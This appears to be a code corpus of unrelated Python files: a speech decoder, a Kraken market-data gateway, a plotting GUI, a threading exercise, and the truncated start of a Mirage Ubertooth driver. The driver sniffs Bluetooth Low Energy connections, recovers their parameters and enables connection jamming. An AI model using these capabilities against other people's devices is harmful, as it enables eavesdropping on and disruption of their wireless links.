self.bt_if = self._conf['bt_if_name']
Thread(target=self.dri_thread).start()
elif self.dri_role == "observer":
self.obs_if = self._conf['obs_if']
Thread(target=self.observer_thread).start()
if __name__ == '__main__':
drone_device_id = DRI()
drone_device_id.run()
|
decode.py
|
# coding=utf-8
#
# Yu Wang (University of Yamanashi)
# Apr, 2021
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import numpy as np
import threading
import time
import subprocess
import os
import queue
from exkaldirt.base import info, mark, is_endpoint, print_
from exkaldirt.base import Component, PIPE, Packet, ContextManager, Endpoint
from exkaldirt.utils import encode_vector_temp
from exkaldirt.feature import apply_floor
#from base import info, mark
#from base import Component, PIPE, Packet, ContextManager
#from utils import encode_vector_temp
#from feature import apply_floor
#from base import Endpoint, is_endpoint, print_
def softmax(data,axis=1):
assert isinstance(data,np.ndarray)
if len(data.shape) == 1:
axis = 0
else:
assert 0 <= axis < len(data.shape)
maxValue = data.max(axis,keepdims=True)
dataNor = data - maxValue
dataExp = np.exp(dataNor)
dataExpSum = np.sum(dataExp,axis,keepdims=True)
return dataExp / dataExpSum
def log_softmax(data,axis=1):
assert isinstance(data,np.ndarray)
if len(data.shape) == 1:
axis = 0
else:
assert 0 <= axis < len(data.shape)
dataShape = list(data.shape)
dataShape[axis] = 1
maxValue = data.max(axis,keepdims=True)
dataNor = data - maxValue
dataExp = np.exp(dataNor)
dataExpSum = np.sum(dataExp,axis)
dataExpSumLog = np.log(dataExpSum) + maxValue.reshape(dataExpSum.shape)
return data - dataExpSumLog.reshape(dataShape)
def load_symbol_table(filePath):
assert os.path.isfile(filePath)
table = {}
with open(filePath,"r") as fr:
lines = fr.readlines()
for line in lines:
w2i = line.strip().split()
assert len(w2i) == 2
ID = w2i[1] #int(w2i[1])
table[ID] = w2i[0]
return table
def get_pdf_dim(hmmFile):
assert os.path.isfile(hmmFile), f"No such file: {hmmFile}."
cmd = f"hmm-info {hmmFile} | grep pdfs"
p = subprocess.Popen(cmd,shell=True,stdout=subprocess.PIPE,stderr=subprocess.PIPE)
out,err = p.communicate()
if p.returncode != 0:
raise Exception("Failed to get hmm info:\n" + err.decode())
else:
return int(out.decode().strip().split()[-1])
class AcousticEstimator(Component):
def __init__(self,func,leftContext=0,rightContext=0,applySoftmax=False,applyLog=True,
priors=None,oKey="data",name=None):
super().__init__(name=name)
assert isinstance(applySoftmax,bool), "<applySoftmax> must be a bool value."
assert isinstance(applyLog,bool), "<applyLog> must be a bool value."
if priors is not None:
assert isinstance(priors,np.ndarray) and len(priors.shape)==1, "<priors> must an 1-d array."
self.__priors = priors
self.__applyLog = applyLog
self.__applySoftmax = applySoftmax
# The acoustic function
assert callable(func)
self.acoustic_function = func
self.__memoryCache = None
assert isinstance(leftContext,int) and leftContext >= 0
assert isinstance(rightContext,int) and rightContext >= 0
if leftContext > 0 or rightContext > 0:
self.__context = ContextManager(left=leftContext,right=rightContext)
else:
self.__context = None
def get_memory(self):
return self.__memoryCache
def set_memory(self,data):
self.__memoryCache = data
def core_loop(self):
lastPacket = None
self.__firstComputing = True
while True:
action = self.decide_action()
#print( "debug action:", action )
if action is True:
packet = self.get_packet()
if not packet.is_empty():
iKey = packet.mainKey if self.iKey is None else self.iKey
mat = packet[iKey]
if self.__context is not None:
newMat = self.__context.wrap( mat )
if newMat is None:
lastPacket = packet
else:
probs = self.__compute_and_postprocess(newMat, mat.shape[0])
if lastPacket is None:
packet.add( self.oKey[0], probs, asMainKey=True )
self.put_packet( packet )
else:
lastPacket.add( self.oKey[0], probs, asMainKey=True )
self.put_packet( packet )
lastPacket = packet
else:
probs = self.__compute_and_postprocess(mat, mat.shape[0])
packet.add( self.oKey[0], probs, asMainKey=True )
self.put_packet( packet )
if is_endpoint(packet):
if lastPacket is not None:
iKey = lastPacket.mainKey if self.iKey is None else self.iKey
mat = np.zeros_like(lastPacket[iKey])
newMat = self.__context.wrap( mat )
probs = self.__compute_and_postprocess(newMat, mat.shape[0])
lastPacket.add( self.oKey[0], probs, asMainKey=True )
self.put_packet( lastPacket )
if packet.is_empty():
self.put_packet( packet )
else:
break
def __compute_and_postprocess(self,mat,frames):
probs = self.acoustic_function( mat )
assert isinstance(probs,np.ndarray) and len(probs.shape) == 2
if len(probs) != frames and self.__firstComputing:
print_( f"{self.name}: Warning! The number of frames has changed, {frames} -> {len(probs)}. Please make sure this is indeed the result you want." )
self.__firstComputing = False
# Post-process
## Softmax
if self.__applySoftmax:
probs = softmax(probs,axis=1)
## Log
if self.__applyLog:
probs = apply_floor(probs)
probs = np.log(probs)
## Normalize with priors
if self.__priors:
assert probs.shape[-1] == len(self.__priors), "priors dimension does not match the output of acoustic function."
probs -= self.__priors
return probs
class WfstDecoder(Component):
def __init__(self,symbolTable,silencePhones,frameShiftSec,tmodel,graph,
wordBoundary=None,nBests=10,beam=16.0,maxActive=7000,minActive=200,
latticeBeam=10.0,pruneInterval=25,
beamDelta=0.5,hashRatio=2.0,pruneScale=0.1,
acousticScale=0.1,lmScale=1,allowPartial=False,
minDuration=0.1,oKey="data",maxBatchSize=100,name=None):
super().__init__(oKey=oKey,name=name)
self.__i2wLexicon = load_symbol_table(symbolTable)
assert isinstance(silencePhones,str) # check the format
assert isinstance(frameShiftSec,float) and frameShiftSec > 0, "<silencePhones> must be a positive float value."
assert os.path.isfile(tmodel), "<tmodel> should be a file path."
assert os.path.isfile(graph), "<graph> should be a file path."
if wordBoundary is not None:
assert os.path.isfile(wordBoundary), "<wordBoundary> should be a file path."
assert isinstance(nBests,int) and nBests > 1, "<nBests> must be an int value and greater than 1."
assert isinstance(beam,(int,float)) and beam > 0, "<beam> must be a positive float value."
assert isinstance(maxActive,int) and maxActive > 0, "<maxActive> must be a positive int value."
assert isinstance(minActive,int) and minActive > 0, "<minActive> must be a positive int value."
assert maxActive > minActive
assert isinstance(latticeBeam,(int,float)) and latticeBeam > 0, "<latticeBeam> must be a positive float value."
assert isinstance(pruneInterval,int) and pruneInterval > 0, "<pruneInterval> must be a positive int value."
assert isinstance(beamDelta,(int,float)) and beamDelta > 0, "<beamDelta> must be a positive float value."
assert isinstance(hashRatio,(int,float)) and hashRatio > 0, "<hashRatio> must be a positive float value."
assert isinstance(pruneScale,(int,float)) and pruneScale > 0, "<pruneScale> must be a positive float value."
assert isinstance(acousticScale,(int,float)) and acousticScale > 0, "<acousticScale> must be a positive float value."
assert isinstance(lmScale,(int,float)) and lmScale > 0, "<lmScale> must be a positive float value."
assert isinstance(allowPartial,bool), "<allowPartial> must be a bool value."
assert isinstance(minDuration,(int,float)) and minDuration > 0, "<minDuration> must be a positive float value."
self.__acoustic_scale = acousticScale
assert isinstance(maxBatchSize,int) and maxBatchSize > 1
self.__max_batch_size = maxBatchSize
# Config the subprocess command
cmd = os.path.join( info.CMDROOT,"exkaldi-online-decoder ")
cmd += f" --beam {beam} " #1
cmd += f" --max-active {maxActive} " #3
cmd += f" --min-active {minActive} " #5
cmd += f" --lattice-beam {latticeBeam} " #7
cmd += f" --prune-interval {pruneInterval} " #9
cmd += f" --beam-delta {beamDelta} " #11
cmd += f" --hash-ratio {hashRatio} " #13
cmd += f" --prune-scale {pruneScale} " #15
cmd += f" --acoustic-scale {acousticScale} " #17
cmd += f" --lm-scale {lmScale} " #19
cmd += f" --chunk-frames {maxBatchSize} " #21
cmd += f" --allow-partial {allowPartial} " #23
cmd += f" --n-bests {nBests} " #25
cmd += f" --silence-phones {silencePhones} " #27
cmd += f" --frame-shift {frameShiftSec} " #29
cmd += f" --tmodel {tmodel} " #31
cmd += f" --fst {graph} " #33
cmd += f" --word-boundary {wordBoundary} " #35
cmd += f" --timeout { int(info.TIMEOUT*1000) } " #37
cmd += f" --timescale { int(info.TIMESCALE*1000) } " #39
self.__cmd = cmd
# Check the dim of probability
self.__pdfs = get_pdf_dim(tmodel)
# A rescoring fucntions
self.rescore_function = None
# The main subprocess to run the decoding loop
self.__decodeProcess = None
# A thread to read results from decoding subprocess
self.__readResultThread = None
# id
self.__packetCache = queue.Queue()
def reset(self):
super().reset()
self.__decodeProcess = None
self.__readResultThread = None
def ids_to_words(self,IDs):
assert isinstance(IDs,list)
result = []
for ID in IDs:
ID = str(ID)
if ID in self.__i2wLexicon.keys():
result.append( self.__i2wLexicon[ID] )
else:
result.append( "<UNK>" )
return " ".join(result)
def __read_result_from_subprocess(self):
'''
This function is used to open a thread to read result from main decoding process.
'''
timecost = 0
try:
while True:
# decide state and action
master, state = self.decide_state()
if state == mark.wrong:
break
elif state == mark.stranded:
time.sleep( info.TIMESCALE )
continue
elif state == mark.terminated:
if master == mark.outPIPE:
break
# if state is active or terminated (master is inPIPE)
# do the following steps
# Read
line = self.__decodeProcess.stdout.readline().decode().strip()
# nothing is received
if line == "":
time.sleep(info.TIMESCALE)
timecost += info.TIMESCALE
if timecost > info.TIMEOUT:
raise Exception(f"{self.name}: Timeout! Receiving thread has not received any data for a long time!")
else:
if line.startswith("-1"):
packet = self.__packetCache.get()
line = line[2:].strip().split() # discard the flag "-1"
if len(line) > 0:
packet.add( self.oKey[0], self.ids_to_words(line), asMainKey=True )
else:
packet.add( self.oKey[0], " ", asMainKey=True )
self.put_packet( packet )
## Endpoint
elif line.startswith("-2"):
packet = self.__packetCache.get()
line = line[2:].strip()
if len(line) == 0:
self.put_packet( packet )
else:
lines = line[2:].strip().split("-1") # discard the flag "-2 -1"
lines = [ line.strip().split() for line in lines if len(line.strip()) > 0 ]
if len(lines) == 0:
packet.add( self.oKey[0], " ", asMainKey=True )
elif len(lines) == 1:
packet.add( self.oKey[0], self.ids_to_words(lines[0]), asMainKey=True )
else:
# do not need to rescore
if self.rescore_function is None:
for i, line in enumerate(lines):
outKey = self.oKey[0] if i == 0 else ( self.oKey[0] + f"-{i+1}" )
packet.add( outKey, self.ids_to_words(line), asMainKey=True )
else:
nbestsInt = [ [ int(ID) for ID in line.split() ] for line in lines ]
nResults = self.rescore_function( nbestsInt )
assert isinstance(nbestsInt,(list,tuple)) and len(nbestsInt) > 0
for i,re in enumerate(nResults):
assert isinstance(re,(list,tuple)) and len(nbestsInt) > 0
outKey = self.oKey[0] if i == 0 else ( self.oKey[0] + f"-{i+1}" )
packet.add( outKey, self.ids_to_words(re), asMainKey=True )
if not is_endpoint(packet):
self.put_packet( packet )
else:
self.put_packet( Endpoint(items=dict(packet.items()),cid=packet.cid,idmaker=packet.idmaker) )
## Final step
elif line.startswith("-3"):
break
else:
raise Exception(f"{self.name}: Expected flag (-1 -> partial) (-2 endpoint) (-3 termination) but got: {line}")
except Exception as e:
if not self.inPIPE.state_is_(mark.wrong,mark.terminated):
self.inPIPE.kill()
if not self.inPIPE.state_is_(mark.wrong,mark.terminated):
self.inPIPE.kill()
raise e
else:
if not self.inPIPE.state_is_(mark.wrong,mark.terminated):
self.inPIPE.terminate()
if not self.inPIPE.state_is_(mark.wrong,mark.terminated):
self.inPIPE.terminate()
finally:
self.__decodeProcess.stdout.close()
self.__decodeProcess.kill()
def core_loop(self):
# start core loop
try:
while True:
action = self.decide_action()
if action is False:
break
elif action is None:
# final step
try:
self.__decodeProcess.stdin.write(b" -3 ")
self.__decodeProcess.stdin.flush()
except Exception as e:
print(self.__decodeProcess.stderr.read().decode())
raise e
break
else:
packet = self.get_packet()
if is_endpoint(packet):
if packet.is_empty():
try:
self.__decodeProcess.stdin.write(b" -2 0 ")
self.__decodeProcess.stdin.flush()
except Exception as e:
print(self.__decodeProcess.stderr.read().decode())
raise e
else:
iKey = packet.mainKey if self.iKey is None else self.iKey
mat = packet[iKey]
assert isinstance(mat,np.ndarray) and len(mat.shape) == 2
assert mat.shape[0] <= self.__max_batch_size, "The chunk size of matrix > max allowable batch size of this decoder."
assert mat.shape[1] == self.__pdfs, "The dim. of probability does not match the PDFs."
mat = self.__acoustic_scale * mat
header = f" -2 {mat.shape[0]} ".encode()
inputs = header + encode_vector_temp( mat.reshape(-1) )
try:
self.__decodeProcess.stdin.write(inputs)
self.__decodeProcess.stdin.flush()
except Exception as e:
print(self.__decodeProcess.stderr.read().decode())
raise e
self.__packetCache.put( packet )
else:
if packet.is_empty():
continue
else:
iKey = packet.mainKey if self.iKey is None else self.iKey
mat = packet[iKey]
assert isinstance(mat,np.ndarray) and len(mat.shape) == 2
assert mat.shape[0] <= self.__max_batch_size, "The chunk size of matrix > max allowable batch size of this decoder."
assert mat.shape[1] == self.__pdfs, "The dim. of probability does not match the PDFs."
mat = self.__acoustic_scale * mat
header = f" -1 {mat.shape[0]} ".encode()
inputs = header + encode_vector_temp( mat.reshape(-1) )
try:
self.__decodeProcess.stdin.write(inputs)
self.__decodeProcess.stdin.flush()
except Exception as e:
print(self.__decodeProcess.stderr.read().decode())
raise e
self.__packetCache.put( packet )
# Wait until all results has been gotten.
self.__readResultThread.join()
# Close the decoding process
self.__decodeProcess.stdin.write(b"over")
finally:
self.__decodeProcess.stdout.close()
self.__decodeProcess.kill()
def _create_thread(self,func):
# open exkaldi online decoding process
self.__decodeProcess = subprocess.Popen(self.__cmd,shell=True,stdin=subprocess.PIPE,stdout=subprocess.PIPE,stderr=subprocess.PIPE)
# open reading result thread
self.__readResultThread = threading.Thread(target=self.__read_result_from_subprocess)
self.__readResultThread.setDaemon(True)
self.__readResultThread.start()
coreThread = threading.Thread(target=func)
coreThread.setDaemon(True)
coreThread.start()
return coreThread
def dump_text_PIPE(pipe,key=None,allowPartial=True,endSymbol="\n"):
'''
Dump a text PIPE to a transcription.
'''
assert isinstance(allowPartial,bool)
assert isinstance(endSymbol,str)
assert pipe.state_is_(mark.wrong,mark.terminated), "<pipe> must be wrong or terminated PIPE."
assert not pipe.is_outlocked()
if key is not None:
assert isinstance(key,str)
result = []
memory = None
while True:
if pipe.is_empty():
break
else:
packet = pipe.get()
if not packet.is_empty():
iKey = packet.mainKey if key is None else key
text = packet[iKey]
assert isinstance(text,str)
memory = text
if is_endpoint(packet):
if memory is None:
continue
else:
result.append(memory)
memory = None
if allowPartial and (memory is not None):
result.append( memory )
return endSymbol.join(result)
|
kraken.py
|
from befh.restful_api_socket import RESTfulApiSocket
from befh.exchanges.gateway import ExchangeGateway
from befh.market_data import L2Depth, Trade
from befh.instrument import Instrument
from befh.util import Logger
import time
import threading
from functools import partial
from datetime import datetime
class ExchGwKrakenRestfulApi(RESTfulApiSocket):
"""
Exchange socket
"""
def __init__(self, proxy=None):
self.proxy = proxy
RESTfulApiSocket.__init__(self, proxy=proxy)
@classmethod
def get_bids_field_name(cls):
return 'bids'
@classmethod
def get_asks_field_name(cls):
return 'asks'
@classmethod
def get_order_book_link(cls, instmt):
return 'https://api.kraken.com/0/public/Depth?pair=%s&count=5' % instmt.get_instmt_code()
@classmethod
def get_trades_link(cls, instmt):
if instmt.get_exch_trade_id() != '' and instmt.get_exch_trade_id() != '0':
return 'https://api.kraken.com/0/public/Trades?pair=%s&since=%s' % \
(instmt.get_instmt_code(), instmt.get_exch_trade_id())
else:
return 'https://api.kraken.com/0/public/Trades?pair=%s' % instmt.get_instmt_code()
@classmethod
def parse_l2_depth(cls, instmt, raw):
"""
Parse raw data to L2 depth
:param instmt: Instrument
:param raw: Raw data in JSON
"""
l2_depth = L2Depth()
keys = list(raw.keys())
if cls.get_bids_field_name() in keys and \
cls.get_asks_field_name() in keys:
# Bids
bids = raw[cls.get_bids_field_name()]
bids = sorted(bids, key=lambda x: x[0], reverse=True)
for i in range(0, len(bids)):
l2_depth.bids[i].price = float(bids[i][0]) if not isinstance(bids[i][0], float) else bids[i][0]
l2_depth.bids[i].volume = float(bids[i][1]) if not isinstance(bids[i][1], float) else bids[i][1]
# Asks
asks = raw[cls.get_asks_field_name()]
asks = sorted(asks, key=lambda x: x[0])
for i in range(0, len(asks)):
l2_depth.asks[i].price = float(asks[i][0]) if not isinstance(asks[i][0], float) else asks[i][0]
l2_depth.asks[i].volume = float(asks[i][1]) if not isinstance(asks[i][1], float) else asks[i][1]
return l2_depth
@classmethod
def parse_trade(cls, instmt, raw):
"""
:param instmt: Instrument
:param raw: Raw data in JSON
:return:
"""
trade = Trade()
# Trade price
trade.trade_price = float(str(raw[0]))
# Trade volume
trade.trade_volume = float(str(raw[1]))
# Timestamp
date_time = float(raw[2])
trade.date_time = datetime.utcfromtimestamp(date_time).strftime("%Y%m%d %H:%M:%S.%f")
# Trade side
trade.trade_side = Trade.parse_side(raw[3])
# Trade id
trade.trade_id = trade.date_time + '-' + str(instmt.get_exch_trade_id())
return trade
@classmethod
def get_order_book(cls, instmt, proxy=None):
"""
Get order book
:param instmt: Instrument
:return: Object L2Depth
"""
res = cls.request(cls.get_order_book_link(instmt), proxy=proxy)
if len(res) > 0 and 'error' in res and len(res['error']) == 0:
res = list(res['result'].values())[0]
return cls.parse_l2_depth(instmt=instmt,
raw=res)
else:
Logger.error(cls.__name__, "Cannot parse the order book. Return:\n%s" % res)
return None
@classmethod
def get_trades(cls, instmt, proxy=None):
"""
Get trades
:param instmt: Instrument
:param trade_id: Trade id
:return: List of trades
"""
res = cls.request(cls.get_trades_link(instmt), proxy=proxy)
trades = []
if len(res) > 0 and 'error' in res and len(res['error']) == 0:
res = res['result']
if 'last' in res.keys():
instmt.set_exch_trade_id(res['last'])
del res['last']
res = list(res.values())[0]
for t in res:
trade = cls.parse_trade(instmt=instmt,
raw=t)
trades.append(trade)
return trades
class ExchGwKraken(ExchangeGateway):
"""
Exchange gateway
"""
def __init__(self, db_clients, proxy=None):
"""
Constructor
:param db_client: Database client
"""
ExchangeGateway.__init__(self, ExchGwKrakenRestfulApi(proxy=proxy), db_clients)
@classmethod
def get_exchange_name(cls):
"""
Get exchange name
:return: Exchange name string
"""
return 'Kraken'
def get_order_book_worker(self, instmt):
"""
Get order book worker
:param instmt: Instrument
"""
while True:
try:
l2_depth = self.api_socket.get_order_book(instmt, proxy=self.api_socket.proxy)
if l2_depth is not None and l2_depth.is_diff(instmt.get_l2_depth()):
instmt.set_prev_l2_depth(instmt.l2_depth.copy())
instmt.set_l2_depth(l2_depth)
instmt.incr_order_book_id()
self.insert_order_book(instmt)
except Exception as e:
Logger.error(self.__class__.__name__,
"Error in order book: %s" % e)
time.sleep(0.5)
def get_trades_worker(self, instmt):
"""
Get order book worker thread
:param instmt: Instrument name
"""
instmt.set_recovered(False)
while True:
try:
ret = self.api_socket.get_trades(instmt, proxy=self.api_socket.proxy)
for trade in ret:
instmt.incr_trade_id()
self.insert_trade(instmt, trade)
# After the first time of getting the trade, indicate the instrument
# is recovered
if not instmt.get_recovered():
instmt.set_recovered(True)
except Exception as e:
Logger.error(self.__class__.__name__,
"Error in trades: %s\nReturn: %s" % (e, ret))
time.sleep(0.5)
def start(self, instmt):
"""
Start the exchange gateway
:param instmt: Instrument
:return List of threads
"""
instmt.set_prev_l2_depth(L2Depth(5))
instmt.set_l2_depth(L2Depth(5))
instmt.set_instmt_snapshot_table_name(self.get_instmt_snapshot_table_name(instmt.get_exchange_name(),
instmt.get_instmt_name()))
self.init_instmt_snapshot_table(instmt)
t1 = threading.Thread(target=partial(self.get_order_book_worker, instmt))
t1.start()
t2 = threading.Thread(target=partial(self.get_trades_worker, instmt))
t2.start()
return [t1, t2]
|
slicer_gui.py
|
import threading
import numpy as np
import json
import sys
import pyqtgraph as pg
from pyqtgraph.Qt import QtGui, QtCore
from pyqtgraph.Point import Point
import traceback
from slicer_constants import MIN_X, MAX_X, POS, SET_SPOTS, SET_REGION, PLAYBACK_MARKER, TIME_IN_HISTORY
spots = [{POS: [0, 0]}, {POS: [2, 1]}]
region = None
scatter_plot = None
# playback_marker_scatter = None
def eprint(*args, **kwargs):
print(*args, file=sys.stderr, **kwargs)
sys.stderr.flush()
def update():
global region
region.setZValue(10)
min_x, max_x = region.getRegion()
print(json.dumps({MIN_X: min_x, MAX_X: max_x}))
sys.stdout.flush()
def set_spots(spots_json):
global spots
spots = spots_json
scatter_plot.setData(spots)
def set_region(region_json):
global spots
global region
min_x = region_json[MIN_X]
max_x = region_json[MAX_X]
if not np.isfinite(min_x): min_x = min(spot[POS][0] for spot in spots)
if not np.isfinite(max_x): max_x = max(spot[POS][0] for spot in spots)
region.setRegion([min_x, max_x])
def set_playback_marker(playback_marker_json):
global playback_marker
global view_box
# This shit makes the gui freeze after a while for some reason
# time_in_history = playback_marker_json[TIME_IN_HISTORY]
# if time_in_history < -1000:
# return
# min_x, max_x = region.getRegion()
# time_in_history = min(max_x, max(min_x, time_in_history))
# playback_spots = [ {POS: (time_in_history, i)} for i in range(7) ]
# playback_marker_scatter.setData(playback_spots)
# eprint(time_in_history)
# playback_marker.setPos((time_in_history,0))
# eprint (playback_marker_json)
def read_input():
try:
while True:
try:
line = input()
except EOFError as e:
return
message = json.loads(line)
if SET_SPOTS in message:
set_spots(message[SET_SPOTS])
elif SET_REGION in message:
set_region(message[SET_REGION])
elif PLAYBACK_MARKER in message:
set_playback_marker(message[PLAYBACK_MARKER])
else:
eprint('bad message: ', message)
except Exception as e:
traceback.print_exc()
sys.stderr.flush()
os.exit(-1)
class NonFocusStealingGraphicsWindow(pg.GraphicsWindow):
def show(self):
self.setAttribute(98) # Qt::WA_ShowWithoutActivating
super().show()
def main():
global region
global scatter_plot
global view_box
# window layout
app = QtGui.QApplication([])
win = NonFocusStealingGraphicsWindow(title='Slicer')
win.setGeometry(0, 660, 600, 380)
label = pg.LabelItem(justify='right')
win.addItem(label)
view_box = win.addPlot(row=1, col=0)
region = pg.LinearRegionItem()
region.setZValue(10)
region.sigRegionChanged.connect(update)
# Add the LinearRegionItem to the ViewBox, but tell the ViewBox to exclude this
# item when doing auto-range calculations.
view_box.addItem(region, ignoreBounds=True)
# pg.dbg()
scatter_plot = pg.ScatterPlotItem(size=10, pen=pg.mkPen(None), brush=pg.mkBrush(255, 255, 255, 120))
set_spots(spots)
view_box.addItem(scatter_plot)
# playback_marker = pg.InfiniteLine(pos=(0,0), angle=30)
# view_box.addItem(playback_marker)
# global playback_marker_scatter
# playback_marker_scatter = pg.ScatterPlotItem(size=10, pen=pg.mkPen(None), brush=pg.mkBrush(255, 255, 255, 120))
# view_box.addItem(playback_marker_scatter)
threading.Thread(target=read_input, daemon=True).start()
if (sys.flags.interactive != 1) or not hasattr(QtCore, 'PYQT_VERSION'):
QtGui.QApplication.instance().exec_()
## Start Qt event loop unless running in interactive mode or using pyside.
if __name__ == '__main__':
main()
|
foo.py
|
# Python 3.3.3 and 2.7.6
# python fo.py
from threading import Thread
import threading
# Potentially useful thing:
# In Python you "import" a global variable, instead of "export"ing it when you declare it
# (This is probably an effort to make you feel bad about typing the word "global")
i = 0
i_lock = threading.Lock()
def incrementingFunction():
global i
# TODO: increment i 1_000_000 times
for j in range(1000000):
i_lock.acquire()
i += 1
i_lock.release()
def decrementingFunction():
global i
# TODO: decrement i 1_000_000 times
for j in range(1000000):
i_lock.acquire()
i -= 1
i_lock.release()
def main():
global i
incrementing = Thread(target = incrementingFunction, args = (),)
decrementing = Thread(target = decrementingFunction, args = (),)
# TODO: Start both threads
incrementing.start()
decrementing.start()
incrementing.join()
decrementing.join()
print("The magic number is %d" % (i))
main()
|
ubertooth.py
|
from scapy.all import *
import struct
from mirage.libs.bt_utils.ubertooth import *
from mirage.libs.ble_utils.constants import *
from mirage.libs.ble_utils import helpers
from mirage.libs import utils,io,wireless
class BLEUbertoothDevice(BtUbertoothDevice):
'''
This device allows to communicate with an Ubertooth Device in order to sniff Bluetooth Low Energy protocol.
The corresponding interfaces are : ``ubertoothX`` (e.g. "ubertooth0")
The following capabilities are actually supported :
+-----------------------------------+----------------+
| Capability | Available ? |
+===================================+================+
| SCANNING | yes |
+-----------------------------------+----------------+
| ADVERTISING | no |
+-----------------------------------+----------------+
| SNIFFING_ADVERTISEMENTS | yes |
+-----------------------------------+----------------+
| SNIFFING_NEW_CONNECTION | yes |
+-----------------------------------+----------------+
| SNIFFING_EXISTING_CONNECTION | yes |
+-----------------------------------+----------------+
| JAMMING_CONNECTIONS | yes |
+-----------------------------------+----------------+
| JAMMING_ADVERTISEMENTS | no |
+-----------------------------------+----------------+
| HIJACKING_CONNECTIONS | no |
+-----------------------------------+----------------+
| INITIATING_CONNECTION | no |
+-----------------------------------+----------------+
| RECEIVING_CONNECTION | no |
+-----------------------------------+----------------+
| COMMUNICATING_AS_MASTER | no |
+-----------------------------------+----------------+
| COMMUNICATING_AS_SLAVE | no |
+-----------------------------------+----------------+
| HCI_MONITORING | no |
+-----------------------------------+----------------+
'''
sharedMethods = [
"getFirmwareVersion",
"getDeviceIndex",
"getMode",
"getSerial",
"setChannel",
"setCRCChecking",
"setScanInterval",
"setScan",
"setJamming",
"isSynchronized",
"getChannel",
"getAccessAddress",
"getCrcInit",
"getChannelMap",
"getHopInterval",
"getHopIncrement",
"setSweepingMode",
"sniffNewConnections",
"sniffExistingConnections",
"sniffAdvertisements"
]
def _initBLE(self):
self.jamming = False
self.synchronized = False
self.sweepingMode = False
self.sniffingMode = None
self.sweepingSequence = []
self.sweepingThreadInstance = None
self.scanThreadInstance = None
self._stop()
self.channel = 37
self.accessAddress = None
self.crcInit = None
self.channelMap = None
self.hopInterval = None
self.hopIncrement = None
self._setCRCChecking(False)
self.setCRCChecking(enable=False)
self.setScanInterval(seconds=2)
self._resetClock()
self._setJamMode(JAM_NONE)
self._setModulation()
self._start()
self.capabilities = ["SCANNING", "SNIFFING_ADVERTISEMENTS", "SNIFFING_EXISTING_CONNECTION", "SNIFFING_NEW_CONNECTION","JAMMING_CONNECTIONS"]
io.success("Ubertooth Device ("+self.interface+") successfully instanciated !")
def _sweepingThread(self):
for channel in self.sweepingSequence:
if ((self.sniffingMode == BLESniffingMode.NEW_CONNECTION and not self.synchronized) or
self.sniffingMode == BLESniffingMode.ADVERTISEMENT):
self.setChannel(channel=channel)
utils.wait(seconds=0.1)
def _startSweepingThread(self):
self._stopSweepingThread()
self.sweepingThreadInstance = wireless.StoppableThread(target=self._sweepingThread)
self.sweepingThreadInstance.start()
def _stopSweepingThread(self):
if self.sweepingThreadInstance is not None:
self.sweepingThreadInstance.stop()
self.sweepingThreadInstance = None
def setSweepingMode(self,enable=True,sequence=[37,38,39]):
'''
This method allows to enable or disable the Sweeping mode. It allows to provide a subset of advertising channels to monitor sequentially.
:param enable: boolean indicating if the Sweeping mode is enabled.
:type enable: bool
:param sequence: sequence of channels to use
:type sequence: list of int
.. note::
This method is a **shared method** and can be called from the corresponding Emitters / Receivers.
'''
self.sweepingMode = enable
if enable:
self.sweepingSequence = sequence
self._startSweepingThread()
else:
self._stopSweepingThread()
def isSynchronized(self):
'''
This method indicates if the sniffer is actually synchronized with a connection.
:return: boolean indicating if the sniffer is synchronized
:rtype: bool
:Example:
>>> device.isSynchronized()
True
.. note::
This method is a **shared method** and can be called from the corresponding Emitters / Receivers.
'''
return self.synchronized and self.accessAddress is not None and self.crcInit is not None and self.channelMap is not None and self.hopIncrement is not None and self.hopInterval is not None
def setJamming(self,enable=True):
'''
This method allows to enable or disable the jamming mode.
:param enable: boolean indicating if the jamming mode must be enabled or disabled
:type enable: bool
:Example:
>>> device.setJamming(enable=True) # jamming mode enabled
>>> device.setJamming(enable=False) # jamming mode disabled
.. note::
This method is a **shared method** and can be called from the corresponding Emitters / Receivers.
'''
self.jamming = enable
def _setAccessAddress(self,accessAddress=None):
self.accessAddress = accessAddress
def _setCrcInit(self,crcInit=None):
self.crcInit = crcInit
def _setChannelMap(self,channelMap=None):
self.channelMap = channelMap
def _setHopInterval(self,hopInterval=None):
self.hopInterval = hopInterval
def _getHopInterval(self):
return self.hopInterval
def _setHopIncrement(self,hopIncrement):
self.hopIncrement = hopIncrement
def _getHopIncrement(self):
return self.hopIncrement
def _getChannelMap(self):
return self.channelMap
def _getAccessAddress(self):
return self.accessAddress
def _getCrcInit(self):
return self.crcInit
def getAccessAddress(self):
'''
This method returns the access address actually in use.
:return: access address
:rtype: int
:Example:
>>> hex(device.getAccessAddress())
'0xe5e296e9'
.. note::
This method is a **shared method** and can be called from the corresponding Emitters / Receivers.
'''
return self.accessAddress
def getCrcInit(self):
'''
This method returns the CRCInit actually in use.
:return: CRCInit
:rtype: int
:Example:
>>> hex(device.getCrcInit())
'0x0bd54a'
.. note::
This method is a **shared method** and can be called from the corresponding Emitters / Receivers.
'''
return self.crcInit
def getChannelMap(self):
'''
This method returns the Channel Map actually in use.
:return: Channel Map
:rtype: int
:Example:
>>> hex(device.getChannelMap())
'0x1fffffffff'
.. note::
This method is a **shared method** and can be called from the corresponding Emitters / Receivers.
'''
return self.channelMap
def getHopInterval(self):
'''
This method returns the Hop Interval actually in use.
:return: Hop Interval
:rtype: int
:Example:
>>> device.getHopInterval()
36
.. note::
This method is a **shared method** and can be called from the corresponding Emitters / Receivers.
'''
return self.hopInterval
def getHopIncrement(self):
'''
This method returns the Hop Increment actually in use.
:return: Hop Increment
:rtype: int
:Example:
>>> device.getHopIncrement()
11
.. note::
This method is a **shared method** and can be called from the corresponding Emitters / Receivers.
'''
return self.hopIncrement
def _updateAccessAddress(self,accessAddress=None):
io.success("Access Address selected : "+"0x{:08x}".format(accessAddress))
self._setAccessAddress(accessAddress)
io.info("Recovering CRCInit ...")
def _updateCrcInit(self,crcInit=None):
io.success("CRCInit successfully recovered : "+"0x{:06x}".format(crcInit))
self._setCrcInit(crcInit)
io.info("Recovering Channel Map ...")
def _updateChannelMap(self,channelMap=None):
channelMap = 0x1fffffffff
